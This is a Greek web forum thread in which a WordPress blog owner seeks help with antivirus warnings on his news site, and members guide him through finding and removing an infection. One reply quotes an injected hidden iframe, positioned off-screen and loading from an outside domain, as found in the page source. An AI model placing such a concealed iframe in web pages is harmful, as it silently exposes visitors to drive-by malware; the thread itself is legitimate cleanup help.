Πρόβλημα ασφαλείας στο blog μου;;;

Μια περιοχή για το WordPress, αυτή την δημοφιλή δωρεάν πλατφόρμα για blogging

Συντονιστές: WebDev Moderators, Super-Moderators, PHP Moderators

Απάντηση
Άβαταρ μέλους
takis1985
Δημοσιεύσεις: 1207
Εγγραφή: 17 Μάιος 2001 03:00
Τοποθεσία: lesvos
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από takis1985 » 09 Απρ 2013 21:58

Καλησπέρα. Δυο - τρεις αναγνώστες του blog μου www.plomarinews.gr μου αναφέρανε ότι του antivirus ή το internet security πρόγραμμα του υπολογιστή τους, τους βγάζει κάποια μήνυμα όταν μπαίνουν στο site αλλά και στο www.plomaricity.gr

Τα προγράμματα είναι avast και norton internet security. Η εταιρεία φιλοξενίας μου είπε σε γενόμενο έλεγχο ότι δεν υπάρχει θέμα. Μπορεί κάποιος να μου πει τι μπορεί να συμβαίνει;

Άβαταρ μέλους
cordis
Administrator, [F|H]ounder, [C|S]EO
Δημοσιεύσεις: 27640
Εγγραφή: 09 Οκτ 1999 03:00
Τοποθεσία: Greece
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από cordis » 09 Απρ 2013 22:46

διάβασε εδώ Reported Attack Page! Η σελίδα έχει αναφερθεί ως κακόβουλη! και τώρα τι κάνω;

εάν περνάς τους ελέγχους δεν έχεις πρόβλημα.
Δεν απαντάω σε προσωπικά μηνύματα με ερωτήσεις που καλύπτονται από τις ενότητες του forum. Για ο,τι άλλο είμαι εδώ για εσάς.
- follow me @twitter

gvre
Δημοσιεύσεις: 992
Εγγραφή: 14 Οκτ 2010 11:34
Τοποθεσία: Ηράκλειο Κρήτης
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από gvre » 09 Απρ 2013 22:58

Με ένα view source στο plomarinews.gr θα δεις ότι υπάρχει ένα περίεργο κομμάτι κώδικα[0] στο site, το οποίο μάλλον δημιουργεί το iframe[1], για το οποίο πετάνε μήνυμα τα antivirus.

[0]

Κώδικας: Επιλογή όλων

bt4t34b=function(){...}
[1]

Κώδικας: Επιλογή όλων

<iframe src="http&#58;//anywayitquerying.biz/cYc7Iy0fgG80mf770zlPb0l40T0GREp0nHW005gmc/" style="left&#58; -10000px; visibility&#58; hidden; top&#58; 0px; position&#58; absolute;" width="100" height="100"></iframe>

Άβαταρ μέλους
takis1985
Δημοσιεύσεις: 1207
Εγγραφή: 17 Μάιος 2001 03:00
Τοποθεσία: lesvos
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από takis1985 » 09 Απρ 2013 23:36

http://safebrowsing.clients.google.com/ ... arinews.gr

Καλησπέρα και σας ευχαριστώ για τις απαντήσεις σας. Έκανα αυτό το test μπορείτε να με βοηθήσετε τι σημαίνουν τα αποτελέσματα;
Εάν βγάλω αυτό το κομμάτι κώδικα που αναφέρεις στο δεύτερο μήνυμα με χειροκίνητο τρόπο είναι εντάξει;

gvre
Δημοσιεύσεις: 992
Εγγραφή: 14 Οκτ 2010 11:34
Τοποθεσία: Ηράκλειο Κρήτης
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από gvre » 09 Απρ 2013 23:41

takis1985 έγραψε:Εάν βγάλω αυτό το κομμάτι κώδικα που αναφέρεις στο δεύτερο μήνυμα με χειροκίνητο τρόπο είναι εντάξει;
Το θέμα είναι να δεις πως μπήκε το συγκεκριμένο κομμάτι κώδικα στο site σου. Για αρχή, δοκίμασε να το βγάλεις και δες αν όλα είναι εντάξει (κάνε ξανά έναν έλεγχο με τα antivirus που έβγαζαν το μήνυμα).

Άβαταρ μέλους
takis1985
Δημοσιεύσεις: 1207
Εγγραφή: 17 Μάιος 2001 03:00
Τοποθεσία: lesvos
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από takis1985 » 09 Απρ 2013 23:48

gvre έγραψε:
takis1985 έγραψε:Εάν βγάλω αυτό το κομμάτι κώδικα που αναφέρεις στο δεύτερο μήνυμα με χειροκίνητο τρόπο είναι εντάξει;
Το θέμα είναι να δεις πως μπήκε το συγκεκριμένο κομμάτι κώδικα στο site σου. Για αρχή, δοκίμασε να το βγάλεις και δες αν όλα είναι εντάξει (κάνε ξανά έναν έλεγχο με τα antivirus που έβγαζαν το μήνυμα).
Θα προσπαθήσω να αφαιρέσω τα κομμάτια κώδικα που ανέφερες.
Υπάρχει περίπτωση ο ιός να είναι μόνο στο theme που έχω επιλεγμένο τώρα; Δηλαδή σε περίπτωση που αλλάξω theme θα είναι οκ;

gvre
Δημοσιεύσεις: 992
Εγγραφή: 14 Οκτ 2010 11:34
Τοποθεσία: Ηράκλειο Κρήτης
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από gvre » 09 Απρ 2013 23:55

Ίσως να είναι και στα άλλα themes. Κάνε μια αναζήτηση να δεις.

Άβαταρ μέλους
takis1985
Δημοσιεύσεις: 1207
Εγγραφή: 17 Μάιος 2001 03:00
Τοποθεσία: lesvos
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από takis1985 » 10 Απρ 2013 18:21

gvre έγραψε:Με ένα view source στο plomarinews.gr θα δεις ότι υπάρχει ένα περίεργο κομμάτι κώδικα[0] στο site, το οποίο μάλλον δημιουργεί το iframe[1], για το οποίο πετάνε μήνυμα τα antivirus.

[0]

Κώδικας: Επιλογή όλων

bt4t34b=function&#40;&#41;&#123;...&#125;
[1]

Κώδικας: Επιλογή όλων

<iframe src="http&#58;//anywayitquerying.biz/cYc7Iy0fgG80mf770zlPb0l40T0GREp0nHW005gmc/" style="left&#58; -10000px; visibility&#58; hidden; top&#58; 0px; position&#58; absolute;" width="100" height="100"></iframe>
Καλησπέρα και πάλι. Έψαξα και εγώ και από την εταιρεία φιλοξενίας για αυτό το κομμάτι κώδικα αλλά δε το βρίσκουμε. Μήπως μπορείς να μου πεις εάν το εντοπίζεις ακόμα; Η μόνη αλλαγή που έκανα ήταν το σβήσιμο κάποιων παλιών theme και η αναβάθμιση στα 3 στανταρ thems του wordpress το twenty ten-eleven-twelve

Άβαταρ μέλους
dva_dev
Script Master
Δημοσιεύσεις: 3790
Εγγραφή: 16 Σεπ 2005 01:32
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από dva_dev » 10 Απρ 2013 20:13

την πρωτη φορα που μπηκα με firefox μου χτηπησε το antivirus. στις επομενες επισκεψεις δεν εβλεπα κατι. αν δεν ειναι στα δικα σου αρχεια ισως να ειναι σε καποιο απο τα εξωτερικα widgets που φορτωνεις. τσεκαρισε τα και (η προσωπικη μου γνωμη) ακομα καλυτερα ξεφορτωσου οτι δεν ειναι δικο σου και δεν μπορεις να το ελεγξεις

gvre
Δημοσιεύσεις: 992
Εγγραφή: 14 Οκτ 2010 11:34
Τοποθεσία: Ηράκλειο Κρήτης
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από gvre » 10 Απρ 2013 21:00

takis1985 έγραψε:
gvre έγραψε:Με ένα view source στο plomarinews.gr θα δεις ότι υπάρχει ένα περίεργο κομμάτι κώδικα[0] στο site, το οποίο μάλλον δημιουργεί το iframe[1], για το οποίο πετάνε μήνυμα τα antivirus.

[0]

Κώδικας: Επιλογή όλων

bt4t34b=function&#40;&#41;&#123;...&#125;
[1]

Κώδικας: Επιλογή όλων

<iframe src="http&#58;//anywayitquerying.biz/cYc7Iy0fgG80mf770zlPb0l40T0GREp0nHW005gmc/" style="left&#58; -10000px; visibility&#58; hidden; top&#58; 0px; position&#58; absolute;" width="100" height="100"></iframe>
Καλησπέρα και πάλι. Έψαξα και εγώ και από την εταιρεία φιλοξενίας για αυτό το κομμάτι κώδικα αλλά δε το βρίσκουμε. Μήπως μπορείς να μου πεις εάν το εντοπίζεις ακόμα; Η μόνη αλλαγή που έκανα ήταν το σβήσιμο κάποιων παλιών theme και η αναβάθμιση στα 3 στανταρ thems του wordpress το twenty ten-eleven-twelve
Δε βλέπω κάτι τώρα, αλλά νωρίτερα που είχα μπει, στο 1ο load της σελίδας είχε ένα περίεργο κώδικα, διαφορετικό από τον προηγούμενο. Ίσως φορτώνεται από κάποιο php, γι' αυτό να μη μπορείς να τον βρεις. Ψάξε στα αρχεία για eval και base64_decode και γενικότερα ακολούθησε αυτό που σου είπε ο dva_dev.

Άβαταρ μέλους
takis1985
Δημοσιεύσεις: 1207
Εγγραφή: 17 Μάιος 2001 03:00
Τοποθεσία: lesvos
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από takis1985 » 10 Απρ 2013 21:57

Καλησπέρα και πάλι. Έβγαλα τους κώδικες από adsense και linkwise και ένα script για που έδειχνε τους live επισκέπτες. Τώρα δεν υπάρχει τίποτα ξένο μέσα.

Δοκίμασα εδώ και είναι το μονο site advisor που αναφέρει πρόβλημα http://www.avgthreatlabs.com/sitereport ... arinews.gr Σας λένε κάτι αυτές οι πληροφορίες;

gvre
Δημοσιεύσεις: 992
Εγγραφή: 14 Οκτ 2010 11:34
Τοποθεσία: Ηράκλειο Κρήτης
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από gvre » 10 Απρ 2013 22:08

Καλύτερα να δεις τα plugins που έχεις εγκαταστήσει στο wordpress. Δε νομίζω ότι σου δημιουργούν πρόβλημα τα js του adsense και της linkwise

Άβαταρ μέλους
takis1985
Δημοσιεύσεις: 1207
Εγγραφή: 17 Μάιος 2001 03:00
Τοποθεσία: lesvos
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από takis1985 » 29 Μάιος 2013 12:17

Καλημέρα. Επειδή το πρόβλημα που ανέφερα παραπάνω, εξακολουθούσε να υπάρχει και αρκετά internet security και antivirus χτηπούσαν ότι έχει πρόβλημα ασφαλείας, κάναμε νέα εγγατάσταση του wordpress καθαρή και δεν έχω κάνει ακόμα import τα δεδομένα από την προηγούμενη. Μπορεί κάποιος να μπει να δει αν το internet security ή το antivirus αναφέρει κάτι; www.plomarinews.gr

gvre
Δημοσιεύσεις: 992
Εγγραφή: 14 Οκτ 2010 11:34
Τοποθεσία: Ηράκλειο Κρήτης
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από gvre » 29 Μάιος 2013 15:53

Με view source δεν είδα κάτι περίεργο.

Άβαταρ μέλους
takis1985
Δημοσιεύσεις: 1207
Εγγραφή: 17 Μάιος 2001 03:00
Τοποθεσία: lesvos
Επικοινωνία:

Πρόβλημα ασφαλείας στο blog μου;;;

Δημοσίευση από takis1985 » 29 Μάιος 2013 15:58

gvre έγραψε:Με view source δεν είδα κάτι περίεργο.
Σ' ευχαριστώ πολύ για την απάντηση. Ποιο antivirus/internet security έχεις;

Απάντηση

Επιστροφή στο “WordPress γενικά”

Μέλη σε σύνδεση

Μέλη σε αυτήν τη Δ. Συζήτηση: Δεν υπάρχουν εγγεγραμμένα μέλη και 1 επισκέπτης